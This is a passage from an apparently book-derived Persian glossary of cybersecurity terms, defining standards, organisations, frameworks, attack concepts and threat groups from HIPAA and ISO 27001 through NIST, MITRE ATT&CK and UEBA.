قانون قابل حمل و پاسخگویی بیمه سلامت(HIPAA) در سال 1996 توسط دولت ایالات متحده تصویب شد و قوانین و مقرراتی را برای محافظت از حریم خصوصی اطلاعات سلامت بیمار ( اطلاعات بهداشتی محافظت شده) و امنیت سوابق الکترونیکی ذخیره شده یا ارسال شده توسط یک نهاد تحت پوشش ارائه می کند. ارتباط HIPAA با امنیت سایبری به این گونه است که این قانون سازمان‌های مطابق با HIPAA را موظف می‌کند: همه داده‌های بهداشتی ارسال، ذخیره، دریافت یا تولید شده دارای محرمانگی قوی باشند. این بدان معناست که می‌تواند فقط برای افراد مجاز برای دسترسی، تغییر یا حذف آن در دسترس باشد. همچنین داده ها باید همیشه برای افراد مجاز در دسترس باشد.

توسعه ای از پروتکل انتقال ابرمتن

HTTPS )Secure Hypertext Transfer Protocol(

برای ارتباط ایمن از طریق یک شبکه کامپیوتری با رمزگذاری اطلاعاتی که از رایانه خود به وب سایت دیگری ارسال می کنید، برای مثال استفاده می شود. این وسیله ای برای اطمینان از حفظ حریم خصوصی، امنیت و همچنین راهی برای احراز هویت است که سایتی که در آن هستید همان سایتی است که قصد بازدید از آن را دارید.

مراکز اشتراک‌گذاری و تجزیه و تحلیل اطلاعات

ISACs( Information Sharing and Analysis Centers)

مراکز اشتراک‌گذاری و تجزیه و تحلیل اطلاعات یک سازمان‌های غیرانتفاعی است که منبع اصلی را برای جمع‌آوری اطلاعات در مورد تهدیدات سایبری (در بسیاری موارد در زیرساخت‌های حیاتی) و همچنین به اشتراک‌گذاری اطلاعات دو طرفه بین بخش خصوصی و دولتی در مورد علل اصلی، حوادث و تهدیدها و همچنین به اشتراک‌گذاری تجربه، دانش و تجزیه و تحلیل به عهده دارند.

فناوری اطلاعات

IT( Information Technology)

فناوری اطلاعات استفاده از هر گونه رایانه، ذخیره سازی، شبکه و سایر دستگاه های فیزیکی، زیرساخت ها و فرآیندها برای ایجاد، پردازش، ذخیره، ایمن سازی و تبادل تمامی اشکال داده های الکترونیکی است. به طور معمول، فناوری اطلاعات در زمینه عملیات تجاری استفاده می شود، برخلاف فناوری که برای اهداف شخصی یا سرگرمی استفاده می شود. استفاده تجاری از فناوری اطلاعات شامل فناوری رایانه و ارتباطات راه دور می شود.

تفاوت فناوری اطلاعات و فناوری عملیاتی

IT vs OT Cyber Security

امنیت فناوری اطلاعات در هر سازمانی به منظور ایمن نگه داشتن و تحت کنترل نگه داشتن داده ها بسیار مهم است. در فناوری عملیاتی ، ایمنی و در دسترس بودن تجهیزات و فرآیندها غالب است.

استاندارد 31000

ISO 31000

Iso 31000 مدیریت ریسک، دستورالعمل ها، اصول، چارچوب و فرآیندی را برای مدیریت ریسک ارائه می دهد. این می تواند توسط هر سازمانی صرف نظر از اندازه، فعالیت یا بخش آن استفاده شود. استفاده از Iso 31000 می‌تواند به سازمان ها کمک کند تا احتمال دستیابی به اهداف را افزایش دهند، شناسایی فرصت ها و تهدیدها را بهبود بخشند و به طور موثر منابع را برای ریسک تخصیص استفاده کنند.

استاندارد27001

ISO 27001

مشخصاتی برای یک سیستم مدیریت امنیت اطلاعات است. گواهینامه ISO 27001برای هر سازمانی اعمال می‌شود که مایل است یا نیاز به رسمیت بخشیدن و بهبود فرآیندهای تجاری پیرامون امنیت اطلاعات، حریم خصوصی و ایمن سازی دارایی های اطلاعاتی خود دارد. یکی از مفاهیم اصلی 27001 شناسایی ریسک ها و سپس تطبیق کنترل ها با ریسک های پیش رو است.

استاندارد27002

ISO 27002

استاندارد 27002مجموعه ای از دستورالعمل های امنیت اطلاعات است که برای کمک به سازمان در پیاده سازی، حفظ و بهبود مدیریت امنیت اطلاعات در نظر گرفته شده است. بسیاری از سازمان ها از ISO 27001و ISO 27002 عنوان چارچوبی برای نشان دادن انطباق با مقررات استفاده می کنند که در آن الزامات دقیق وجود دارد.

استاندارد27005

ISO 27005

ISO 27005 استاندارد بین المللی است که نحوه انجام ارزیابی ریسک امنیت اطلاعات را مطابق با الزامات ISO 27001 شرح می دهد. این استاندارد روش های مدیریت ریسک را تشریح می کند. هدف از مرحله ارزیابی ریسک، فرآیند تجزیه و تحلیل و آنچه ممکن است رخ دهد و پیامدهای آن را تعریف میکند، و به سازمان ها کمک می کند تا تعیین کنند چه کاری باید انجام شود و چه زمانی ریسک را تا حد قابل قبولی کاهش دهند.

اطلاعات تضمین

IA )Information Assurance(

اطلاعات تضمین اقداماتی که از اطلاعات و سیستم های اطلاعاتی با اطمینان از در دسترس بودن، یکپارچگی، احراز هویت، محرمانه بودن و عدم انکار آنها محافظت و دفاع می کند.

مدیریت هویت و دسترسی IAM

IAM )Identity and access management (

چارچوبی از سیاست ها و فناوری ها برای اطمینان از دسترسی مناسب افراد مناسب به منابع فناوری است. این به سازمان‌ها کمک می‌کند تا دسترسی به حساب «با حداقل امتیاز» یا «اعتماد صفر» را حفظ کنند، جایی که کارمندان فقط به حداقل داده‌های مورد نیاز برای نقش‌های خود دسترسی دارند.

رمزگذاری مبتنی بر هویت IBE

IBE) Identity-Based Encryption (

رمزگذاری مبتنی بر هویت IBE نوعی رمزگذاری با کلید عمومی که در آن کلید عمومی یک کاربر اطلاعات منحصر به فردی در مورد هویت کاربر است، برای مثال آدرس ایمیل کاربر.

تجزیه و تحلیل ترافیک شبکه

IDS/IDP)Intrusion Detection/Intrusion Detection and Prevention Intrusion Detection Systems (IDS)

ترافیک شبکه را برای امضاهایی که با حملات سایبری شناخته شده مطابقت دارند تجزیه و تحلیل می کند. سیستم‌های پیشگیری از نفوذ ( IPS) بسته‌ها را نیز تجزیه و تحلیل می‌کنند، اما همچنین می‌توانند بسته‌ها را بر اساس نوع حملاتی که شناسایی می‌کند، متوقف کنند و به توقف حمله کمک کنند.

انجمن حسابرسی و کنترل سیستم های اطلاعاتی

ISACA) Information Systems Audit and Control Association(

ISACA گواهینامه هایی را برای متخصصان امنیت فناوری اطلاعات، حسابرسی و مدیریت ریسک ارائه می دهد. ISACA همچنین چارچوب COBIT را برای مدیریت و حاکمیت فناوری اطلاعات حفظ می کند. ISACA در سال 1969 توسط گروه کوچکی از افراد که نیاز به منبع متمرکز اطلاعات و راهنمایی در زمینه رو به رشد کنترل های حسابرسی برای سیستم های کامپیوتری را تشخیص دادند، ثبت شد. امروزه ISACA به متخصصان در 180 کشور جهان خدمات ارائه می دهد.

انجمن امنیت اینترنت ISAKMP و پروتکل مدیریت کلید

ISAKMP) Internet Security Association and Key Management Protocol (

پروتکلی برای ایجاد انجمن های امنیتی و کلیدهای رمزنگاری در یک محیط اینترنت. ISAKMP تنها چارچوبی برای احراز هویت و تبادل کلید ارائه می‌کند و به گونه‌ای طراحی شده است که مستقل از مبادله کلید باشد.

برنامه اتوماسیون امنیت اطلاعات ISAP

ISAP) Information Security Automation Program(

ISAP یک ابتکار آژانس دولتی ایالات متحده برای فعال کردن اتوماسیون و استانداردسازی عملیات امنیتی فنی است. طراحی مبتنی بر استانداردهای آن ممکن است برای کسانی که در بخش خصوصی هستند نیز مفید باشد.

کنسرسیوم صدور گواهینامه امنیت سیستم های اطلاعات بین المللی

(ISC)² )International Information Systems Security Certification Consortium(

یک سازمان غیرانتفاعی که در آموزش و صدور گواهینامه برای متخصصان امنیت سایبری تخصص دارد. گواهینامه‌ها شامل CISSP است.

سازمان بین‌المللی استاندارد ISO

ISO)International Organization for Standardization(

سازمانی است که استانداردهای بین‌المللی را در انواع مختلف، از جمله دو استاندارد مدیریت امنیت اطلاعات، ISO 27001 و 27002 ISO ، توسعه می‌دهد.

انجمن امنیت سیستم های اطلاعات ISSA

ISSA) Information Systems Security Association(

ISSA یک سازمان غیرانتفاعی و بین المللی متشکل از متخصصان و متخصصان امنیت اطلاعات است.

مسئول امنیت سیستم های اطلاعات ISSO

ISSO )Information Systems Security Officer(

فردی که مسئولیت حفظ وضعیت امنیتی عملیاتی مناسب برای یک سیستم یا برنامه اطلاعاتی را بر عهده دارد.

مدیر برنامه امنیت سیستم های اطلاعاتی ISSPM

ISSPM)Information Systems Security Program Manager(

ISSPM که گاهی اوقات مدیر امنیت فناوری اطلاعات نیز نامیده می شود، سیاست ها و کنترل های امنیتی را هماهنگ و اجرا می کند و همچنین آسیب پذیری های یک شرکت را ارزیابی می کند. آنها اغلب مسئول پردازش امنیت داده ها و شبکه، مدیریت سیستم های امنیتی و بررسی تخلفات امنیتی هستند

شکلی از حمله به تلفن همراه متمرکز بر اندروید

JBOH (JavaScript-Binding-Over-HTTP)

شکلی از حمله به دستگاه تلفن همراه متمرکز بر اندروید که این امکان را به یک مهاجم میدهد تا بتواند اجرای کد دلخواه را روی یک دستگاه در معرض خطر آغاز کند. یک حمله JBOHاغلب از طریق برنامه های در معرض خطر یا مخرب انجام می شود یا تسهیل می شود

استفاده از امنیت جاوا

JSM) Java Security Manager(

برای محافظت از برنامه جاوا در برابر انجام اقدامات بالقوه ناامن، می توانید یک مدیر امنیتی را برای JVM که برنامه در آن اجرا می شود فعال کنید. مدیر امنیتی یک خط مشی امنیتی را اعمال می کند که مجموعه ای از مجوزها (امتیازات دسترسی به سیستم) است که به منابع کد اختصاص داده می شود.

شاخص ریسک کلیدی

KRI (Key Risk Indicator)

KRI معیارهای شاخص ریسک کلیدی سطح ریسک یک سازمان را بیان می کند و به رهبران امنیتی و کسب و کار اجازه می دهد تا چگونگی تکامل پروفایل ریسک را ردیابی کنند. به عنوان مثال، عملیات امنیت سایبری می تواند از معیارهایی استفاده کند که تهدیدات و آسیب پذیری های گزارش شده توسط ابزارهای مختلف را تحلیل می کند.

شبکه محلی LAN

LAN(Local Area Network)

شبکه محلی LAN دو یا چند دستگاه که متصل هستند و می توانند منابع را به اشتراک بگذارند.

ماتریس ATT&CK

MITER ATT&CK (MITRE Adversarial Tactics, Techniques, and Common Knowledge)

این چارچوب یک پایگاه دانش و مدل مدیریت شده برای رفتار دشمن سایبری است که منعکس کننده مراحل مختلف چرخه حیات حمله دشمن و پلتفرم‌هایی است که شناخته شده‌اند. این ماتریکس شامل مجموعه ای از تکنیک‌هایی است که توسط دشمنان برای دستیابی به یک هدف خاص استفاده می شود. این اهداف به عنوان تاکتیک ها در ماتریس ATT&CK دسته بندی می شوند. اهداف به صورت خطی از نقطه شناسایی تا هدف نهایی نفوذ یا "ضربه" ارائه می شوند(در فصل دوم این کتاب به صورت کامل در این مورد صحبت شده است).

مرکز تجزیه و تحلیل و به اشتراک گذاری اطلاعات چند ایالتی

MS-ISAC )Multi-State Information Sharing and Analysis Center(

ماموریت MS-ISAC بهبود وضعیت امنیت سایبری کلی دولت های ایالتی، محلی، قبیله ای و سرزمینی کشور از طریق پیشگیری، حفاظت، واکنش و بازیابی تهدیدات سایبری متمرکز است.

ارائه دهنده خدمات امنیتی مدیریت شده

MSSP)Managed Security Services Provider(

MSSP نظارت و مدیریت برون سپاری دستگاه ها و سیستم های امنیتی را ارائه می دهد. خدمات متداول شامل فایروال مدیریت شده، تشخیص نفوذ، شبکه خصوصی مجازی، اسکن آسیب پذیری و خدمات ضد ویروسی است.

یک سرویس برون سپاری

MDR(Managed Detection and Response)

یک سرویس برون سپاری که از کارشناسان خارجی استفاده می کند تا مزایای امنیتی ابزارهایی مانند EDR و شکار پیشگیرانه تهدید را در دسترس مشتریان در تمام سطوح بلوغ قرار دهند.

موسسه ملی استاندارد و فناوری

NIST(National Institute of Standards and Technology)

چارچوب امنیت سایبریNIST یک ابزار قدرتمند برای سازماندهی و بهبود برنامه امنیت سایبری است. مجموعه‌ای از دستورالعمل‌ها و بهترین شیوه‌ها برای کمک به سازمان‌ها در ایجاد و بهبود وضعیت امنیت سایبری است. این چارچوب مجموعه‌ای از توصیه‌ها و استانداردها را ارائه می‌دهد که سازمان‌ها را قادر می‌سازد تا در شناسایی و تشخیص حملات سایبری آمادگی بیشتری داشته باشند و همچنین دستورالعمل‌هایی در مورد نحوه پاسخگویی، پیشگیری و بازیابی حوادث سایبری ارائه می‌دهد. چارچوب امنیت سایبری که توسط موسسه ملی استاندارد و فناوری(NIST) تهیه شده است، در مورد امنیت سایبری به فقدان استانداردها می‌پردازد و مجموعه‌ای یکنواخت از قوانین، دستورالعمل‌ها و استانداردها را برای استفاده سازمان‌ها در صنایع مختلف ارائه می‌دهد. چارچوب امنیت سایبریNIST به عنوان استاندارد طلایی برای ایجاد یک برنامه امنیت سایبری در نظر گرفته می‌شود. این چارچوب همه قابلیت‌ها، پروژه‌ها، فرایندها، فعالیت‌های روزمره امنیت سایبری را در این 5 هسته طبقه‌بندی می‌کند: شناسایی: عملکرد شناسایی بر ایجاد زمینه برای یک برنامه امنیت سایبری موثر متمرکز شده است. این عملکرد به توسعه درک سازمانی برای مدیریت خطر امنیت سایبری برای سیستم‌ها، افراد، دارایی‌ها، داده‌ها و قابلیت‌ها کمک می‌کند. محافظت: عملکرد محافظت ضمانت‌های مناسب برای اطمینان از ارائه خدمات زیربنایی حیاتی را مشخص می‌کند و از توانایی محدود کردن یا مهار تأثیر یک رویداد احتمالی امنیت سایبری پشتیبانی می‌کند. تشخیص: تشخیص حوادث احتمالی امنیت سایبری بسیار مهم است و این عملکرد فعالیت‌های مناسب برای شناسایی به موقع وقوع یک امنیت سایبری را مشخص می‌کند. پاسخ دادن: عملکرد بر فعالیت‌های مناسب برای اقدام در صورت شناسایی یک حادثه امنیت سایبری متمرکز است و از توانایی مهار تأثیر یک حادثه احتمالی امنیت سایبری پشتیبانی می‌کند.

نوعی استاندارد و دستورالعمل‌

NIST SP 800-53

استانداردها و دستورالعمل‌هایی را برای سازمان‌های فدرال برای معماری و مدیریت سیستم‌های امنیت اطلاعات خود تعریف می‌کند. این برای ارائه راهنمایی برای حفاظت از داده‌های خصوصی شهروندان ایجاد شده است.

یک نوع سند

NIST SP 800-171

یک سند که حکم می‌کند چگونه پیمانکاران آژانس‌های فدرال باید اطلاعات کنترل نشده طبقه بندی شده را مدیریت کنند. به طور خاص برای سیستم‌ها و سازمان‌های اطلاعاتی غیرفدرال طراحی شده است.

نشر ویژه 800-181 NIST

NIST SP 800-181

تجدید نظر در چارچوب NIST ( نشر ویژه 800-181) ارائه می‌دهد: مجموعه ای کارآمد از "بلوک های سازنده" متشکل از بیانیه های وظیفه، دانش و مهارت، معرفی شایستگی ها به عنوان مکانیزمی برای سازمان ها برای ارزیابی فراگیران

ابتکار ملی برای آموزش امنیت سایبری

NICE(National Initiative for Cybersecurity Education)

ماموریت NICE انرژی بخشیدن، ترویج و هماهنگی یک جامعه قوی است که با هم کار می کنند تا یک اکوسیستم یکپارچه آموزش امنیت سایبری و توسعه نیروی کار را پیش ببرند.

چارچوب نیروی کار برای امنیت سایبری

NICE Framework

چارچوب نیروی کار برای امنیت سایبری، یک مرجع اساسی برای توصیف و به اشتراک گذاری اطلاعات در مورد کار امنیت سایبری است که آن کار را به عنوان بیانیه های وظیفه بیان می‌کند و بیانیه های دانش و مهارت را توصیف می کند که پایه ای را برای یادگیرندگان از جمله دانش آموزان، جویندگان کار و کارمندان فراهم می کند. NICE یک واژگان مشترک و ثابت است که کار امنیت سایبری را طبقه بندی و توصیف می کند. چارچوب ارتباط را در مورد نحوه شناسایی، استخدام، توسعه و حفظ بهبود می بخشد. استعدادهای امنیت سایبری چارچوب NICE مرجعی است که سازمان‌ها یا بخش‌ها می‌توانند از طریق آن نشریات یا ابزارهای بیشتری را ایجاد کنند که نیازهای آنها را برای تعریف یا ارائه راهنمایی در مورد جنبه‌های مختلف آموزش امنیت سایبری، آموزش، و توسعه نیروی کار برآورده کند.

محتوای تکمیلی چارچوب نیروی کار برای امنیت سایبری

NICE Framework Supplemental Material

لیستی از شایستگی ها، نقش های کاری، وظایف، دانش و بیانیه های مهارت - از انتشارات ثابت حذف شده است. این انعطاف‌پذیری را برای به‌روزرسانی‌های مکرر به موادی که به طور منظم مرجع هستند، می‌دهد.

…..

NIST NICE

ابتکار ملی NIST برای آموزش امنیت سایبری ( NICE) مشارکتی بین دولت، دانشگاه و بخش خصوصی است که بر آموزش امنیت سایبری، آموزش، و توسعه نیروی کار متمرکز است.

پایگاه ملی آسیب پذیری

NVD(National Vulnerability Database)

NVD مخزن دولت ایالات متحده از داده های مدیریت آسیب پذیری مبتنی بر استاندارد است که با استفاده از پروتکل اتوماسیون محتوای امنیتی (SCAP) ارائه شده است. این داده ها خودکارسازی مدیریت آسیب پذیری، اندازه گیری امنیت و انطباق را امکان پذیر می کند. NVD شامل پایگاه‌های داده‌ای از مراجع چک‌لیست امنیتی، نقص‌های نرم‌افزار مرتبط با امنیت، پیکربندی‌های نادرست، نام محصولات و معیارهای تأثیر است.

پایگاه ملی آسیب پذیری و رابط های پروتکل برنامه

NVD API

NVD برای خدمت بهتر به پایگاه کاربر رو به رشد خود، کلیدهای API را در دسترس قرار داده. کاربرانی که یک کلید را درخواست و فعال می کنند ممکن است آن را به عنوان پارامتری از رشته URL درخواست خود بگنجانند. همراه با انتشار کلیدهای API، NVD از اسناد و اطلاعات جدید API برای کمک به توسعه دهندگان جدید برای شروع کار با NVD API رونمایی خواهد کرد. با شروع شش ماه پس از انتشار کلیدهای API، کاربرانی که درخواست‌های بدون کلید را ارسال می‌کنند، شاهد کاهش تعداد درخواست‌هایی هستند که می‌توانند در یک پنجره 60 ثانیه‌ای در حال انجام باشند. کاربرانی که درخواست‌هایی را ارسال می‌کنند که شامل کلید API آنها می‌شود، هیچ تغییری در سرویس مشاهده نمی‌کنند و ممکن است به درخواست‌ها با نرخ فعلی ادامه دهند.

مرکز ملی تعالی امنیت سایبری

NCCoE( National Cybersecurity Center of Excellence)

مرکز ملی تعالی امنیت سایبری بخشی از بخش امنیت سایبری کاربردی آزمایشگاه فناوری اطلاعات NIST است. NCCoE اعضای صنعت خصوصی، سازمان های دولتی و دانشگاه را گرد هم می آورد. تا با هم راه‌حل‌های عملی و مبتنی بر استاندارد ایجاد کنند که سازمان‌ها در هر نوع و اندازه بتوانند برای محافظت از دارایی‌ها، افراد و داده‌های خود استفاده کنند. هر پروژه NCCoE توسط یک محقق اصلی NIST هدایت می‌شود که نظارت بر فرآیند توسعه را فراهم می کند و تیمی از کارشناسان موضوعی از جمله تخصص NCF را مدیریت می کند. از طریق NCCoE، دولت، صنعت و دانشگاه با یکدیگر همکاری می کنند تا به مهم ترین چالش‌های امنیت سایبری زیرساخت های تجاری رسیدگی کنند.

چارچوب امنیت سایبری NIST

NIST Cybersecurity Framework

چارچوب امنیت سایبری NISTمجموعه ای از دستورالعمل ها برای کاهش خطرات امنیت سایبری سازمانی است که توسط موسسه ملی استانداردها و فناوری ایالات متحده (NIST) بر اساس استانداردها، دستورالعمل ها و شیوه‌های موجود منتشر شده است. این چارچوب "رده بندی سطح بالایی از نتایج امنیت سایبری و روشی برای ارزیابی و مدیریت آن، علاوه بر راهنمایی در مورد حفاظت از حریم خصوصی و آزادی های مدنی در زمینه امنیت سایبری نتایجی ارائه می دهد.

چارچوب امنیت سایبری

Nist Cisco CSF

موسسه ملی استاندارد و فناوری چارچوب امنیت سایبری را توسعه داد. این سازمان‌ها را در هر اندازه‌ای قادر می‌سازد تا در مورد خطرات امنیت سایبری بحث، رسیدگی و مدیریت کنند.

مدرسه ای در آژانس امنیت ملی

NCS)National Cryptologic School(

NCS به نیروی کار NSA و جامعه اطلاعاتی آن و شرکای وزارت دفاع آموزش های بسیار تخصصی رمزنگاری و همچنین دوره هایی در زمینه رهبری، توسعه حرفه ای و بیش از 40 زبان خارجی ارائه می دهد.

یک سازمان غیرانتفاعی

NCSA)National Cyber Security Alliance(

یک سازمان غیرانتفاعی که با وزارت امنیت داخلی، حامیان بخش خصوصی و همکاران غیرانتفاعی همکاری می کند تا آگاهی امنیت سایبری را برای کاربران خانگی، مشاغل کوچک و متوسط و آموزش ابتدایی و متوسطه ارتقا دهد.

ماه آگاهی امنیت سایبری ملی

NCSAM)National Cyber Security Awareness Month(

NCSAM یک تلاش مشترک بین دولت و صنعت برای افزایش آگاهی در مورد اهمیت امنیت سایبری و اطمینان از این است که همه آمریکایی ها منابع مورد نیاز برای ایمن تر و ایمن تر بودن آنلاین را دارند. هر سال در ماه اکتبر اتفاق می افتد. ماه آگاهی امنیتی با تلاش مشترک بخش امنیت سایبری ملی در وزارت امنیت داخلی و اتحاد غیرانتفاعی امنیت سایبری ملی آغاز شد.

بخش امنیت سایبری ملی

NCSD )National Cyber Security Division(

NCSD بخشی از دفتر امنیت سایبری و ارتباطات با مأموریت همکاری با بخش خصوصی، دولت، ارتش و ذینفعان اطلاعاتی برای انجام ارزیابی ریسک و کاهش آسیب‌پذیری‌ها و تهدیدات برای دارایی‌های فناوری اطلاعات و فعالیت‌های مؤثر بر عملیات. زیرساخت‌های سایبری حیاتی دولت غیرنظامی و بخش خصوصی.

یک منبع آنلاین برای آموزش امنیت سایبری

NICCS)National Initiative for Cybersecurity Careers and Studies(

یک منبع آنلاین برای آموزش امنیت سایبری است که کارمندان دولت، دانشجویان، مربیان و صنعت را با ارائه دهندگان آموزش امنیت سایبری در سراسر ایالات متحده مرتبط می کند.

راهنمای عملیاتی برنامه امنیت ملی صنعتی

NISPOM)National Industrial Security Program Operating Manual(

NISPOM دستورالعمل عملیاتی برنامه امنیت صنعتی ملی، رویه ها و الزامات استاندارد را برای همه پیمانکاران دولتی با توجه به اطلاعات طبقه بندی شده ایجاد می کند. این کل زمینه مسائل مربوط به امنیت دولتی و صنعتی را پوشش می دهد.

فناوری عملیاتی

OT( Operational Technology)

فناوری عملیاتی استفاده از سخت افزار و نرم افزار برای نظارت و کنترل فرآیندهای فیزیکی، دستگاه ها و زیرساخت ها است.

امنیت عملیاتی OPSEC

OPSEC)Operational Security(

OPSEC اصطلاحی است که از ارتش ایالات متحده گرفته شده است و یک فرآیند تحلیلی است که برای رد اطلاعات دشمن استفاده می شود که می تواند محرمانه بودن و/یا امنیت عملیاتی یک ماموریت را به خطر بیندازد. انجام تکنیک های مربوط به OPSEC می تواند نقش مهمی در هر دو حمله ایفا کند. و استراتژی های دفاعی امنیت سایبری.

اطلاعات منبع باز OSINT

OSINT)Open Source Intelligence(

OSINT اطلاعاتی است که از داده‌های در دسترس عموم جمع‌آوری می‌شود، مورد بهره‌برداری قرار می‌گیرد و گزارش می‌شود تا یک نیاز اطلاعاتی خاص را برطرف کند. در جامعه اطلاعاتی، اصطلاح "باز" به منابع آشکار و در دسترس عموم (در مقابل منابع مخفی یا مخفی) اشاره دارد.

استاندارد امنیت داده های صنعت کارت پرداخت

PCI-DSS( Payment Card Industry Data Security Standard)

استاندارد امنیت داده‌های صنعت کارت پرداخت طبق قرارداد برای کسانی که داده‌های دارنده کارت را مدیریت می‌کنند، چه یک شرکت نوپا یا یک شرکت جهانی باشد، الزامی است. هدف آن کمک به ایمن سازی و حفاظت از کل اکوسیستم کارت پرداخت است.

مدیریت نظارت از راه دور

RMM ( Remote monitoring management )

مدیریت نظارت از راه دور که به عنوان مدیریت شبکه نیز شناخته می شود، نوعی پلتفرم است که برای کمک به ارائه دهندگان خدمات فناوری اطلاعات مدیریت شده طراحی شده است تا از راه دور و به طور فعال نقاط پایانی مشتری، شبکه ها و رایانه ها را نظارت کنند. همچنین اکنون به عنوان مدیریت فناوری اطلاعات از راه دور شناخته می شود.

تحلیل ریسک و مدیریت برای حفاظت از دارایی‌های حیاتی

RAMCAP( Risk Analysis and Management for Critical Asset Protection)

چارچوبی برای تجزیه و تحلیل و مدیریت خطرات مرتبط با حملات تروریستی علیه دارایی های زیرساختی حیاتی است و فرآیندی برای ارزیابی پیامدها، آسیب پذیری و خطرات ناشی از تروریسم و مخاطرات طبیعی میباشد. RAMCAP توسط مؤسسه فناوری‌های نوآورانه ASME، LLC، برای تسهیل مقایسه خطرات بین دارایی‌ها در یک بخش و در بخش‌های مختلف با استفاده از اصطلاحات رایج و معیارهای اندازه‌گیری استاندارد توسعه داده شد. RAMCAP روشی است که در برنامه ملی حفاظت از زیرساخت (NIPP) برای استفاده در مقایسه بین بخشی مشخص شده است.

روت کیت

Rootkit

دشمنان ممکن است از روت کیت ها برای پنهان کردن وجود برنامه ها، فایل ها، اتصالات شبکه، سرویس ها، درایورها و سایر اجزای سیستم استفاده کنند. روت کیت ها برنامه هایی هستند که وجود بدافزار را با رهگیری/قلاب کردن و اصلاح فراخوانی های API سیستم عامل که اطلاعات سیستم را تامین می کنند، پنهان می کنند. قابلیت فعال‌سازی روت‌کیت‌ها یا روت‌کیت ممکن است در سطح کاربر یا هسته در سیستم‌عامل یا پایین‌تر باشد، که شامل Hypervisor، Master Boot Record یا Firmware سیستم می‌شود. روت‌کیت‌ها برای سیستم‌های Windows، Linux و Mac OS X دیده شده‌اند

ربودن منابع

Resource Hijacking

دشمنان ممکن است از منابع سیستم های انتخاب شده برای حل مشکلات منابع فشرده استفاده کنند که ممکن است بر دسترسی سیستم و/یا سرویس میزبان تاثیر بگذارد. یکی از اهداف متداول Resource Hijacking اعتبارسنجی تراکنش‌های شبکه‌های ارزهای دیجیتال و کسب ارز مجازی است. دشمنان ممکن است منابع سیستم کافی را مصرف کنند تا تأثیر منفی بگذارند و/یا باعث شوند ماشین‌های آسیب‌دیده پاسخگو نباشند. سرورها و سیستم‌های مبتنی بر ابر] به دلیل پتانسیل بالای منابع موجود، اهداف مشترکی هستند، اما سیستم‌های نقطه پایانی کاربر نیز ممکن است به خطر بیفتند و برای ربودن منابع و استخراج ارزهای دیجیتال مورد استفاده قرار گیرند. محیط‌های کانتینری نیز ممکن است به دلیل سهولت استقرار از طریق APIهای در معرض دید و پتانسیل مقیاس‌گذاری فعالیت‌های استخراج با استقرار یا به خطر انداختن چندین کانتینر در یک محیط یا خوشه مورد هدف قرار گیرند.به‌علاوه، برخی بدافزارهای استخراج ارز دیجیتال، فرآیندهای بدافزار رقیب را از بین می‌برند تا اطمینان حاصل کنند که برای منابع رقابت نمی‌کنند.

گروه مجرم سایبری

RTM

یک گروه مجرم سایبری است که حداقل از سال 2015 فعال بوده و در درجه اول به کاربران سیستم های بانکی از راه دور در روسیه و کشورهای همسایه علاقه مند است. این گروه از تروجانی با همین نام (RTM) استفاده می‌کند.

گزارش کنترل خدمات سازمان نوع 1

Soc( Service Organization Control)1 report

گزارش کنترل خدمات سازمان نوع 1 (که به عنوان گزارش لحظه به لحظه نامیده می‌شود)، شامل توصیفی از سیستم یک سازمان خدماتی است و همچنین تأیید می‌کند که آیا کنترل‌های داخلی توصیف‌شده توسط یک سازمان خدماتی برای دستیابی به اهداف کنترلی مشخص طراحی شده‌اند یا خیر.

گزارش کنترل خدمات سازمان نوع 2

soc2 report

گزارش کنترل خدمات سازمان نوع 2 یک استاندارد حسابرسی است که توسط موسسه حسابداران رسمی آمریکا (AICPA) توسعه یافته است. طراحی شده است تا اطمینان حاصل شود که ارائه دهندگان خدمات و فروشندگان شخص ثالث از داده های حساس و اطلاعات شخصی در برابر دسترسی غیرمجاز محافظت می کنند.

گزارش کنترل خدمات سازمان نوع 3

soc3 report

گزارش کنترل خدمات سازمان نوع 3 اطلاعات مربوط به کنترل های داخلی یک سازمان خدماتی را برای امنیت، در دسترس بودن، یکپارچگی پردازش، محرمانه بودن یا حفظ حریم خصوصی نشان می دهد.

پروتکل اتوماسیون محتوای امنیتی

SCAP(Security Content Automation Protocol)

پروتکل اتوماسیون محتوای امنیتی روشی برای استفاده از استانداردهای خاص برای فعال کردن مدیریت آسیب‌پذیری خودکار، اندازه‌گیری و ارزیابی انطباق خط‌مشی سیستم‌های مستقر در یک سازمان، از جمله مطابقت FISMA (قانون مدیریت امنیت اطلاعات فدرال، 2002 است.

موسسه مدیریت، شبکه و امنیت سیستم

SANS (System Administration)

SANS یک شرکت خصوصی که در آموزش امنیت اطلاعات و صدور گواهینامه امنیتی تخصص دارد.

نوعی سیستم

SSO (Single Sign-On)

سیستمی که به کاربران این امکان را می دهد تا با ورود به سیستم با یک مجموعه از اعتبارنامه ها، به طور ایمن خود را با چندین برنامه و وب سایت احراز هویت کنند.

یک گروه تهدید

TA459

یک گروه تهدید است که گمان می رود خارج از چین فعالیت می کند و کشورهایی از جمله روسیه، بلاروس، مغولستان و سایر کشورها را هدف قرار داده است.

یک گروه تهدید با انگیزه مالی

TA505

TA505یک گروه تهدید با انگیزه مالی است که حداقل از سال 2014 فعال بوده است. این گروه به دلیل تغییر مکرر بدافزارها و هدایت روندهای جهانی در توزیع بدافزارهای جنایی شناخته شده است.

یک گروه تهدید با انگیزه مالی

TA551

TA551یک گروه تهدید با انگیزه مالی است که حداقل از سال 2018 فعال بوده است. این گروه عمدتاً از طریق کمپین های توزیع بدافزار مبتنی بر ایمیل، انگلیسی، آلمانی، ایتالیایی و ژاپنی زبانان را هدف قرار داده است.

تاکتیک ها، تکنیک ها و رویه های رفتار یک هکر

TTP)Tactics, Techniques, and Procedures(

TTP تاکتیک بالاترین سطح توصیف این رفتار است، در حالی که تکنیک‌ها توصیف دقیق‌تری از رفتار در زمینه یک تاکتیک ارائه می‌دهند، و توصیفی حتی سطح پایین‌تر و بسیار دقیق را در زمینه یک تکنیک انجام می‌دهند.

تجزیه و تحلیل رفتار کاربر

UBA / UEBA )User Behavior Analytics(

کاربران سیستم را ردیابی می کند و به دنبال الگوهای رفتاری غیرعادی است. در امنیت سایبری، این فرآیند به شناسایی تهدیدات داخلی و سایر حملات هدفمند از جمله کلاهبرداری مالی کمک می کند. راه‌حل‌های تحلیل رفتار کاربر به الگوهای رفتار انسان نگاه می‌کنند و سپس الگوریتم‌ها و تحلیل‌های آماری را برای تشخیص ناهنجاری‌های معنادار از آن الگوها اعمال می‌کنند. این امر تلاش‌ها را برای اصلاح رفتار غیرعمدی که کسب‌وکار را در معرض خطر و فریب‌های پرخطر و عمدی قرار می‌دهد هدایت می‌کند.

شبکه خصوصی مجازی

